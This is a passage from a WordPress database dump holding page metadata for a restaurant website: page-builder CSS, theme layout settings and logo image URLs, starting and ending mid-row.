z-index: 20;\r\n}'),(44569,3975,'_wpb_post_custom_css','.main-home-first-row {\r\n    position: relative;\r\n    z-index: 10;\r\n}\r\n.main-home-second-row {\r\n    position: relative;\r\n    z-index: 20;\r\n}'),(44570,3975,'_wpb_shortcodes_custom_css','.vc_custom_1534503338704{padding-top: 150px !important;}.vc_custom_1536913540691{padding-top: 130px !important;}.vc_custom_1533133301464{margin-right: 13% !important;margin-left: 13% !important;}.vc_custom_1533133353763{padding-top: 100px !important;}.vc_custom_1537264652300{margin-top: -65px !important;margin-right: 0px !important;margin-left: 0px !important;}.vc_custom_1533736057368{margin-top: -375px !important;}.vc_custom_1533739073010{margin-top: -60px !important;}.vc_custom_1536047365110{margin-top: -160px !important;}.vc_custom_1537347303080{padding-top: 225px !important;padding-right: 12% !important;padding-bottom: 140px !important;padding-left: 12% !important;background-color: rgba(237,223,211,0.4) !important;*background-color: rgb(237,223,211) !important;}.vc_custom_1533811367372{margin-top: -306px !important;}.vc_custom_1537280502379{padding-top: 13% !important;padding-bottom: 13% !important;}.vc_custom_1533809912373{margin-top: -86px !important;}.vc_custom_1533811471107{margin-top: -336px !important;}.vc_custom_1534769660562{margin-top: -190px !important;}.vc_custom_1534769683015{margin-top: -374px !important;}.vc_custom_1534769891217{margin-left: -50px !important;}.vc_custom_1534769906135{margin-top: -62px !important;}.vc_custom_1536064601390{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1536064623328{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1536064682800{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1536064749849{padding-right: 0px !important;padding-left: 0px !important;}'),(38648,3040,'mkdf_menu_area_background_color_meta','#f8f2ed'),(38649,3040,'mkdf_menu_area_height_meta','70px'),(38650,3040,'_wpb_post_custom_css','.main-home-first-row {\r\n    position: relative;\r\n    z-index: 10;\r\n}\r\n.main-home-second-row {\r\n    position: relative;\r\n    z-index: 20;\r\n}'),(38651,3040,'mkdf_header_behaviour_meta','sticky-header-on-scroll-up'),(38652,3040,'mkdf_custom_sticky_menu_area_sidebar_meta','custom-sticky'),(38653,3040,'mkdf_smooth_page_transitions_meta','yes'),(38654,3040,'mkdf_page_transition_preloader_meta','yes'),(38655,3040,'mkdf_smooth_pt_spinner_type_meta','pulse'),(38656,3040,'mkdf_smooth_pt_spinner_color_meta','#000000'),(38657,3041,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38658,3041,'_wp_page_template','full-width.php'),(38659,3041,'slide_template','default'),(38660,3041,'_wpb_vc_js_status','true'),(38661,3041,'mkdf_page_content_behind_header_meta','no'),(38662,3041,'mkdf_disable_vertical_header_background_image_meta','no'),(38663,3041,'mkdf_disable_header_widget_areas_meta','yes'),(38664,3041,'mkdf_page_content_padding','0'),(38665,3041,'_wpb_shortcodes_custom_css','.vc_custom_1535460622871{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534147387272{padding-top: 120px !important;padding-bottom: 120px !important;}.vc_custom_1534152695378{padding-top: 65px !important;padding-bottom: 160px !important;}.vc_custom_1535985514307{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535461280310{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535459248703{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1533043384159{padding-top: 4px !important;}.vc_custom_1533043390970{padding-top: 4px !important;}.vc_custom_1533043398297{padding-top: 4px !important;}.vc_custom_1533043409686{padding-top: 4px !important;}.vc_custom_1533043430614{padding-top: 4px !important;}.vc_custom_1533027694804{margin-top: -120px !important;}.vc_custom_1533813662568{padding-top: 39% !important;padding-right: 31% !important;}.vc_custom_1534936187501{margin-top: -97px !important;padding-left: 12% !important;}.vc_custom_1533029626211{padding-top: 30px !important;}.vc_custom_1537283902655{margin-top: -125px !important;}.vc_custom_1536848053140{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534151757973{padding-right: 0px !important;}.vc_custom_1534151543242{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534150759198{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534151021205{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534163280454{padding-right: 0px !important;padding-left: 0px !important;}'),(38666,3041,'mkdf_show_title_area_meta','no'),(38667,3041,'mkdf_logo_image_meta','https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h2-logo-center-1png.png'),(38668,3041,'mkdf_logo_image_dark_meta','https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h2-logo-center-1png.png'),(38669,3041,'mkdf_logo_image_light_meta','https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h2-logo-center-1png.png'),(38670,3041,'mkdf_logo_image_sticky_meta','https://www.ristorantesolymar.it/wp-content/uploads/2018/08/logo.png'),(38671,3041,'mkdf_logo_image_mobile_meta','https://www.ristorantesolymar.it/wp-content/uploads/2018/08/logo.png'),(38672,3041,'_wpb_post_custom_css','.mkdf-page-header .mkdf-logo-area .mkdf-logo-wrapper a,\n.mkdf-page-header .mkdf-menu-area .mkdf-logo-wrapper a {\n    max-height: 125px;\n}\n\n@media only screen and (min-width: 1025px) {\n    .home-two-second-row,\n    .home-two-third-row {\n        display: none;\n    }\n}\n\n@media only screen and (max-width: 1024px) {\n    .home-two-first-row {\n        display: none;\n    }\n}'),(38673,3041,'mkdf_header_behaviour_meta','sticky-header-on-scroll-up'),(38674,3041,'mkdf_smooth_page_transitions_meta','yes'),(38675,3041,'mkdf_page_transition_preloader_meta','yes'),(38676,3041,'mkdf_smooth_pt_spinner_type_meta','pulse'),(38677,3041,'mkdf_smooth_pt_spinner_color_meta','#000000'),(38678,3042,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38679,3042,'_wp_page_template','full-width.php'),(38680,3042,'slide_template','default'),(38681,3042,'_wpb_vc_js_status','true'),(38682,3042,'mkdf_page_content_behind_header_meta','no'),(38683,3042,'mkdf_disable_vertical_header_background_image_meta','no'),(38684,3042,'mkdf_disable_header_widget_areas_meta','no'),(38685,3042,'_wpb_shortcodes_custom_css','.vc_custom_1535379851915{margin-bottom: -90px !important;padding-top: 80px !important;}.vc_custom_1537284312649{padding-top: 130px !important;padding-bottom: 130px !important;}.vc_custom_1534432930786{padding-top: 130px !important;padding-bottom: 130px !important;}.vc_custom_1534433450023{padding-top: 130px !important;padding-bottom: 130px !important;}.vc_custom_1535633159717{padding-bottom: 200px !important;}.vc_custom_1534515728554{margin-top: -90px !important;margin-bottom: -90px !important;}'),(38686,3042,'mkdf_page_content_padding','0'),(38687,3042,'mkdf_header_type_meta','header-bottom'),(38688,3042,'mkdf_show_title_area_meta','no'),(38689,3042,'mkdf_menu_area_side_padding_meta','30px'),(38690,3042,'mkdf_page_slider_meta','[rev_slider alias=\"seafood-restaurant\"]'),(38691,3043,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38692,3043,'_wp_page_template','full-width.php'),(38693,3043,'slide_template','default'),(38694,3043,'_wpb_vc_js_status','true'),(38695,3043,'mkdf_page_content_behind_header_meta','no'),(38696,3043,'mkdf_disable_vertical_header_background_image_meta','no'),(38697,3043,'mkdf_disable_header_widget_areas_meta','no'),(38698,3043,'mkdf_page_content_padding','0'),(38699,3043,'mkdf_header_type_meta','header-divided'),(38700,3043,'mkdf_show_title_area_meta','no'),(38701,3043,'mkdf_menu_area_background_color_meta','#ffffff'),(38702,3043,'mkdf_menu_area_background_transparency_meta','1'),(38703,3043,'mkdf_menu_area_height_meta','80'),(38704,3043,'mkdf_disable_footer_meta','yes'),(38705,3043,'mkdf_header_behaviour_meta','fixed-on-scroll'),(38706,3043,'_wpb_shortcodes_custom_css','.vc_custom_1533285714962{padding-right: 0px !important;padding-left: 0px !important;}'),(38707,3044,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38708,3044,'_wp_page_template','default'),(38709,3044,'slide_template','default'),(38710,3044,'_wpb_vc_js_status','false'),(38711,3044,'mkdf_page_content_behind_header_meta','no'),(38712,3044,'mkdf_disable_vertical_header_background_image_meta','no'),(38713,3044,'mkdf_disable_header_widget_areas_meta','no'),(38714,3044,'mkdf_show_title_area_meta','yes'),(38715,3044,'mkdf_title_area_type_meta','attika'),(38716,3044,'mkdf_menu_area_background_color_meta','#ffffff'),(38717,3044,'mkdf_custom_header_widget_area_two_meta','shop-header-widgets'),(38718,3044,'mkdf_page_content_padding','150px 0'),(38719,3045,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38720,3045,'_wp_page_template','full-width.php'),(38721,3045,'slide_template','default'),(38722,3045,'_wpb_vc_js_status','true'),(38723,3045,'mkdf_page_content_behind_header_meta','no'),(38724,3045,'mkdf_disable_vertical_header_background_image_meta','no'),(38725,3045,'mkdf_disable_header_widget_areas_meta','no'),(38726,3045,'mkdf_show_title_area_meta','yes'),(38727,3045,'mkdf_title_area_type_meta','attika'),(38728,3045,'mkdf_menu_area_background_color_meta','#ffffff'),(38729,3045,'_wpb_shortcodes_custom_css','.vc_custom_1535549530866{padding-top: 50px !important;padding-bottom: 120px !important;}'),(38730,3045,'mkdf_custom_header_widget_area_two_meta','shop-header-widgets'),(38731,3046,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38732,3046,'_wpb_shortcodes_custom_css','.vc_custom_1535549496113{padding-top: 50px !important;padding-bottom: 120px !important;}'),(38733,3046,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38734,3046,'_wp_page_template','full-width.php'),(38735,3046,'slide_template','default'),(38736,3046,'_wpb_vc_js_status','true'),(38737,3046,'mkdf_page_content_behind_header_meta','no'),(38738,3046,'mkdf_disable_vertical_header_background_image_meta','no'),(38739,3046,'mkdf_disable_header_widget_areas_meta','no'),(38740,3046,'mkdf_show_title_area_meta','yes'),(38741,3046,'mkdf_title_area_type_meta','attika'),(38742,3046,'mkdf_menu_area_background_color_meta','#ffffff'),(38743,3046,'_wpb_shortcodes_custom_css','.vc_custom_1535549496113{padding-top: 50px !important;padding-bottom: 120px !important;}'),(38744,3046,'_dp_original','377'),(38745,3046,'mkdf_custom_header_widget_area_two_meta','shop-header-widgets'),(38746,3047,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38747,3047,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38748,3047,'_wp_page_template','full-width.php'),(38749,3047,'slide_template','default'),(38750,3047,'_wpb_vc_js_status','true'),(38751,3047,'mkdf_page_content_behind_header_meta','no'),(38752,3047,'mkdf_disable_vertical_header_background_image_meta','no'),(38753,3047,'mkdf_disable_header_widget_areas_meta','no'),(38754,3047,'mkdf_show_title_area_meta','yes'),(38755,3047,'mkdf_title_area_type_meta','attika'),(38756,3047,'mkdf_menu_area_background_color_meta','#ffffff'),(38757,3047,'_dp_original','377'),(38758,3047,'mkdf_page_content_padding','80px 0 140px'),(38759,3047,'mkdf_page_content_padding_mobile','0px 0px 0px 0px'),(38760,3047,'_wpb_shortcodes_custom_css','.vc_custom_1535372522645{padding-right: 80px !important;padding-left: 80px !important;}'),(38761,3047,'mkdf_custom_header_widget_area_two_meta','shop-header-widgets'),(38762,3048,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38763,3048,'_wpb_shortcodes_custom_css','.vc_custom_1534510995016{padding-right: 0px !important;padding-left: 0px !important;}'),(38764,3048,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38765,3048,'_wp_page_template','full-width.php'),(38766,3048,'slide_template','default'),(38767,3048,'_wpb_vc_js_status','true'),(38768,3048,'mkdf_page_content_behind_header_meta','no'),(38769,3048,'mkdf_disable_vertical_header_background_image_meta','no'),(38770,3048,'mkdf_disable_header_widget_areas_meta','no'),(38771,3048,'mkdf_page_content_padding','0'),(38772,3048,'mkdf_header_type_meta','header-divided'),(38773,3048,'mkdf_show_title_area_meta','no'),(38774,3048,'mkdf_menu_area_background_color_meta','#ffffff'),(38775,3048,'mkdf_menu_area_background_transparency_meta','1'),(38776,3048,'mkdf_menu_area_height_meta','80'),(38777,3048,'mkdf_disable_footer_meta','yes'),(38778,3048,'mkdf_header_behaviour_meta','fixed-on-scroll'),(38779,3048,'_wpb_shortcodes_custom_css','.vc_custom_1534510995016{padding-right: 0px !important;padding-left: 0px !important;}'),(38780,3048,'_dp_original','351'),(38781,3049,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38782,3049,'_wp_page_template','full-width.php'),(38783,3049,'slide_template','default'),(38784,3049,'_wpb_vc_js_status','true'),(38785,3049,'mkdf_page_content_behind_header_meta','no'),(38786,3049,'mkdf_disable_vertical_header_background_image_meta','no'),(38787,3049,'mkdf_disable_header_widget_areas_meta','no'),(38788,3049,'_wpb_shortcodes_custom_css','.vc_custom_1535113284246{padding-top: 130px !important;}.vc_custom_1534171353151{padding-top: 65px !important;padding-bottom: 130px !important;}'),(38789,3049,'mkdf_page_content_padding','0'),(38790,3049,'mkdf_header_type_meta','header-divided'),(38791,3049,'mkdf_show_title_area_meta','no'),(38792,3050,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38793,3050,'_wpb_shortcodes_custom_css','.vc_custom_1535634921180{padding-top: 130px !important;padding-bottom: 120px !important;}.vc_custom_1534159322757{padding-bottom: 90px !important;}.vc_custom_1533304689022{padding-bottom: 60px !important;}.vc_custom_1535112631536{padding-right: 5% !important;padding-left: 5% !important;}.vc_custom_1534163857016{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165933476{padding-right: 0px !important;}.vc_custom_1535112595718{margin-left: 0px !important;padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535110087401{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535110136872{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165820540{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165836132{padding-right: 0px !important;padding-left: 0px !important;}'),(38794,3050,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38795,3050,'_wp_page_template','full-width.php'),(38796,3050,'slide_template','default'),(38797,3050,'_wpb_vc_js_status','true'),(38798,3050,'mkdf_page_content_behind_header_meta','no'),(38799,3050,'mkdf_disable_vertical_header_background_image_meta','no'),(38800,3050,'mkdf_disable_header_widget_areas_meta','no'),(38801,3050,'_wpb_shortcodes_custom_css','.vc_custom_1535634921180{padding-top: 130px !important;padding-bottom: 120px !important;}.vc_custom_1534159322757{padding-bottom: 90px !important;}.vc_custom_1533304689022{padding-bottom: 60px !important;}.vc_custom_1535112631536{padding-right: 5% !important;padding-left: 5% !important;}.vc_custom_1534163857016{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165933476{padding-right: 0px !important;}.vc_custom_1535112595718{margin-left: 0px !important;padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535110087401{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535110136872{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165820540{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165836132{padding-right: 0px !important;padding-left: 0px !important;}'),(38802,3050,'mkdf_page_content_padding','0'),(38803,3050,'mkdf_header_type_meta','header-divided'),(38804,3050,'_dp_original','430'),(38805,3050,'mkdf_show_title_area_meta','no'),(38806,3051,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38807,3051,'_wp_page_template','full-width.php'),(38808,3051,'slide_template','default'),(38809,3051,'_wpb_vc_js_status','true'),(38810,3051,'mkdf_page_content_behind_header_meta','no'),(38811,3051,'mkdf_disable_vertical_header_background_image_meta','no'),(38812,3051,'mkdf_disable_header_widget_areas_meta','no'),(38813,3051,'mkdf_show_title_area_meta','no'),(38814,3051,'mkdf_page_content_padding','0'),(38815,3051,'_wpb_shortcodes_custom_css','.vc_custom_1534508236123{padding-right: 0px !important;}'),(38816,3051,'mkdf_disable_footer_meta','yes'),(38817,3052,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38818,3052,'_wp_page_template','full-width.php'),(38819,3052,'slide_template','default'),(38820,3052,'_wpb_vc_js_status','true'),(38821,3052,'mkdf_page_content_behind_header_meta','no'),(38822,3052,'mkdf_page_content_padding','130px 0 0 '),(38823,3052,'mkdf_disable_vertical_header_background_image_meta','no'),(38824,3052,'mkdf_disable_header_widget_areas_meta','no'),(38825,3052,'mkdf_show_title_area_meta','no'),(38826,3052,'_wpb_shortcodes_custom_css','.vc_custom_1533721367903{padding-top: 100px !important;padding-bottom: 100px !important;}.vc_custom_1534512863336{padding-left: 0px !important;}'),(38827,3053,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38828,3053,'_wp_page_template','full-width.php'),(38829,3053,'slide_template','default'),(38830,3053,'_wpb_vc_js_status','true'),(38831,3053,'mkdf_page_content_behind_header_meta','no'),(38832,3053,'mkdf_page_content_padding','0 0 0 0'),(38833,3053,'mkdf_page_content_padding_mobile','0 0 0 0'),(38834,3053,'mkdf_header_type_meta','header-minimal'),(38835,3053,'mkdf_disable_vertical_header_background_image_meta','no'),(38836,3053,'mkdf_disable_header_widget_areas_meta','no'),(38837,3053,'mkdf_show_title_area_meta','no'),(38838,3053,'mkdf_disable_footer_meta','yes'),(38839,3053,'mkdf_custom_header_widget_area_two_meta','logo-fullscreen'),(38840,3054,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38841,3054,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38842,3054,'_wp_page_template','full-width.php'),(38843,3054,'slide_template','default'),(38844,3054,'_wpb_vc_js_status','true'),(38845,3054,'mkdf_page_content_behind_header_meta','no'),(38846,3054,'mkdf_page_content_padding','110px 0 0 '),(38847,3054,'mkdf_disable_vertical_header_background_image_meta','no'),(38848,3054,'mkdf_disable_header_widget_areas_meta','no'),(38849,3054,'_dp_original','513'),(38850,3054,'mkdf_show_title_area_meta','no'),(38851,3054,'_wpb_shortcodes_custom_css','.vc_custom_1533717792911{padding-top: 150px !important;padding-bottom: 150px !important;}.vc_custom_1534508595924{margin-top: -130px !important;}'),(38852,3055,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38853,3055,'_wp_page_template','default'),(38854,3055,'slide_template','default'),(38855,3055,'_wpb_vc_js_status','true'),(38856,3055,'mkdf_page_content_behind_header_meta','no'),(38857,3055,'mkdf_disable_vertical_header_background_image_meta','no'),(38858,3055,'mkdf_disable_header_widget_areas_meta','no'),(38859,3055,'mkdf_show_title_area_meta','no'),(38860,3055,'mkdf_disable_footer_meta','yes'),(38861,3055,'mkdf_menu_area_in_grid_meta','yes'),(38862,3055,'mkdf_header_type_meta','header-minimal'),(38863,3055,'mkdf_page_content_padding','0 0 0 0'),(38864,3055,'mkdf_page_content_padding_mobile','0 0 0 0'),(38865,3055,'mkdf_custom_header_widget_area_two_meta','logo-fullscreen'),(38866,3441,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38867,3441,'_wp_page_template','full-width.php'),(38868,3441,'slide_template','default'),(38869,3441,'_wpb_vc_js_status','true'),(38870,3441,'mkdf_page_content_behind_header_meta','no'),(38871,3441,'mkdf_page_content_padding','0 0 0 0'),(38872,3441,'mkdf_page_content_padding_mobile','0 0 0 0'),(38873,3441,'mkdf_header_type_meta','header-vertical'),(38874,3441,'mkdf_disable_vertical_header_background_image_meta','no'),(38875,3441,'mkdf_disable_header_widget_areas_meta','no'),(38876,3441,'mkdf_show_title_area_meta','no'),(38877,3441,'_wpb_shortcodes_custom_css','.vc_custom_1535368696442{padding-top: 123px !important;padding-bottom: 90px !important;}.vc_custom_1536934540610{padding-top: 100px !important;padding-bottom: 100px !important;}.vc_custom_1535368707127{padding-top: 123px !important;padding-bottom: 90px !important;}.vc_custom_1535368714455{padding-top: 123px !important;padding-bottom: 90px !important;}.vc_custom_1535960592176{margin-right: 0px !important;margin-left: 0px !important;}.vc_custom_1535011548259{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535011578720{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535011594412{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535011617855{padding-right: 0px !important;padding-left: 0px !important;}'),(38878,3441,'mkdf_custom_header_widget_area_one_meta','left-menu'),(38879,3441,'mkdf_disable_footer_meta','yes'),(38880,3057,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38881,3057,'_wpb_shortcodes_custom_css','.vc_custom_1533725150863{padding-top: 210px !important;padding-bottom: 200px !important;}.vc_custom_1534513038512{padding-bottom: 200px !important;}.vc_custom_1534514381983{padding-right: 0px !important;}.vc_custom_1534514542346{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534514550307{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534514557722{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534514436317{padding-left: 0px !important;}'),(38882,3057,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38883,3057,'_wp_page_template','full-width.php'),(38884,3057,'slide_template','default'),(38885,3057,'_wpb_vc_js_status','true'),(38886,3057,'mkdf_page_content_behind_header_meta','no'),(38887,3057,'mkdf_page_content_padding','130px 0 0 '),(38888,3057,'mkdf_disable_vertical_header_background_image_meta','no'),(38889,3057,'mkdf_disable_header_widget_areas_meta','no'),(38890,3057,'mkdf_show_title_area_meta','no'),(38891,3057,'_wpb_shortcodes_custom_css','.vc_custom_1533725150863{padding-top: 210px !important;padding-bottom: 200px !important;}.vc_custom_1534513038512{padding-bottom: 200px !important;}.vc_custom_1534514381983{padding-right: 0px !important;}.vc_custom_1534514542346{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534514550307{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534514557722{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534514436317{padding-left: 0px !important;}'),(38892,3057,'_dp_original','513'),(38893,3058,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38894,3058,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38895,3058,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38896,3058,'_wp_page_template','full-width.php'),(38897,3058,'slide_template','default'),(38898,3058,'_wpb_vc_js_status','true'),(38899,3058,'mkdf_page_content_behind_header_meta','no'),(38900,3058,'mkdf_page_content_padding','130px 0 0'),(38901,3058,'mkdf_disable_vertical_header_background_image_meta','no'),(38902,3058,'mkdf_disable_header_widget_areas_meta','no'),(38903,3058,'mkdf_show_title_area_meta','no'),(38904,3058,'_dp_original','744'),(38905,3058,'_wpb_shortcodes_custom_css','.vc_custom_1535445887028{padding-top: 140px !important;padding-bottom: 35px !important;}.vc_custom_1535445909857{padding-bottom: 200px !important;}.vc_custom_1535380918653{padding-bottom: 40px !important;}.vc_custom_1534240845257{padding-bottom: 30px !important;}.vc_custom_1535446084271{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534234226432{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535445707647{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535382774510{padding-right: 0px !important;}.vc_custom_1533823767013{padding-top: 10px !important;}.vc_custom_1533823767013{padding-top: 10px !important;}.vc_custom_1533823767013{padding-top: 10px !important;}.vc_custom_1533823767013{padding-top: 10px !important;}.vc_custom_1533823767013{padding-top: 10px !important;}.vc_custom_1533823767013{padding-top: 10px !important;}.vc_custom_1535447972496{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535447959496{margin-top: -15px !important;margin-left: -30px !important;padding-top: 0px !important;padding-right: 0px !important;padding-left: 0px !important;}'),(38906,3058,'_wpb_post_custom_css','.mkdf-row-parallax-background-elements-holder.mkdf-parallax-elements-top .mkdf-row-parallax-right{\n    top: 1%;\n}'),(38908,3059,'_wpb_shortcodes_custom_css','.vc_custom_1535635181617{padding-top: 130px !important;}.vc_custom_1534504832287{padding-top: 100px !important;padding-bottom: 200px !important;}.vc_custom_1535116332165{margin-top: -50px !important;margin-bottom: -210px !important;}'),(44577,3979,'_wpb_shortcodes_custom_css','.vc_custom_1535635181617{padding-top: 130px !important;}.vc_custom_1534504832287{padding-top: 100px !important;padding-bottom: 200px !important;}.vc_custom_1535116332165{margin-top: -50px !important;margin-bottom: -210px !important;}'),(38910,3059,'_wp_page_template','full-width.php'),(38911,3059,'slide_template','default'),(38912,3059,'_wpb_vc_js_status','true'),(38913,3059,'mkdf_page_content_behind_header_meta','no'),(38914,3059,'mkdf_disable_vertical_header_background_image_meta','no'),(38915,3059,'mkdf_disable_header_widget_areas_meta','no'),(38916,3059,'_wpb_shortcodes_custom_css','.vc_custom_1535635181617{padding-top: 130px !important;}.vc_custom_1534504832287{padding-top: 100px !important;padding-bottom: 200px !important;}.vc_custom_1535116332165{margin-top: -50px !important;margin-bottom: -210px !important;}'),(38917,3059,'mkdf_page_content_padding','0'),(38918,3059,'mkdf_header_type_meta','header-divided'),(38919,3059,'mkdf_show_title_area_meta','no'),(38920,3059,'_dp_original','430'),(38921,3060,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38922,3060,'_wp_page_template','full-width.php'),(38923,3060,'slide_template','default'),(38924,3060,'_wpb_vc_js_status','true'),(38925,3060,'mkdf_page_content_behind_header_meta','no'),(38926,3060,'mkdf_page_content_padding','0 0 0 0 '),(38927,3060,'mkdf_page_content_padding_mobile','0 0 0 0'),(38928,3060,'mkdf_set_menu_area_position_meta','center'),(38929,3060,'mkdf_disable_vertical_header_background_image_meta','no'),(38930,3060,'mkdf_menu_area_background_color_meta','#ffffff'),(38931,3060,'mkdf_menu_area_background_transparency_meta','0.4'),(38932,3060,'mkdf_disable_header_widget_areas_meta','no'),(38933,3060,'mkdf_show_title_area_meta','no'),(38934,3060,'mkdf_disable_footer_meta','yes'),(38935,3060,'mkdf_header_type_meta','header-standard'),(38936,3060,'mkdf_custom_header_widget_area_one_meta','custom-opener'),(38937,3060,'mkdf_header_behaviour_meta','no-behavior'),(38938,3061,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38939,3061,'_wp_page_template','default'),(38940,3061,'slide_template','default'),(38941,3061,'_wpb_vc_js_status','false'),(38942,3061,'mkdf_page_content_behind_header_meta','no'),(38943,3061,'mkdf_disable_vertical_header_background_image_meta','no'),(38944,3061,'mkdf_disable_header_widget_areas_meta','no'),(38945,3062,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38946,3062,'_wp_page_template','default'),(38947,3062,'slide_template','default'),(38948,3062,'_wpb_vc_js_status','true'),(38949,3062,'mkdf_page_content_behind_header_meta','no'),(38950,3062,'mkdf_page_content_padding','120px 0 160px 0'),(38951,3062,'mkdf_page_content_padding_mobile','120px 0 160px 0'),(38952,3062,'mkdf_disable_vertical_header_background_image_meta','no'),(38953,3062,'mkdf_disable_header_widget_areas_meta','no'),(38954,3062,'mkdf_title_area_type_meta','attika'),(38955,3063,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38956,3063,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38957,3063,'_wp_page_template','default'),(38958,3063,'slide_template','default'),(38959,3063,'_wpb_vc_js_status','true'),(38960,3063,'mkdf_page_content_behind_header_meta','no'),(38961,3063,'mkdf_page_content_padding','122px 0 160px 0'),(38962,3063,'mkdf_page_content_padding_mobile','122px 0 160px 0'),(38963,3063,'mkdf_disable_vertical_header_background_image_meta','no'),(38964,3063,'mkdf_disable_header_widget_areas_meta','no'),(38965,3063,'mkdf_title_area_type_meta','attika'),(38966,3063,'_dp_original','1151'),(38967,3064,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38968,3064,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38969,3064,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38970,3064,'_wp_page_template','full-width.php'),(38971,3064,'slide_template','default'),(38972,3064,'_wpb_vc_js_status','true'),(38973,3064,'mkdf_page_content_behind_header_meta','no'),(38974,3064,'mkdf_page_content_padding','30px 30px 50px 30px'),(38975,3064,'mkdf_page_content_padding_mobile','30px 30px 50px 30px'),(38976,3064,'mkdf_disable_vertical_header_background_image_meta','no'),(38977,3064,'mkdf_disable_header_widget_areas_meta','no'),(38978,3064,'mkdf_title_area_type_meta','attika'),(38979,3064,'_dp_original','1160'),(38980,3065,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38981,3065,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38982,3065,'_wp_page_template','default'),(38983,3065,'slide_template','default'),(38984,3065,'_wpb_vc_js_status','true'),(38985,3065,'mkdf_page_content_behind_header_meta','no'),(38986,3065,'mkdf_page_content_padding','120px 0 170px 0'),(38987,3065,'mkdf_page_content_padding_mobile','120px 0 170px 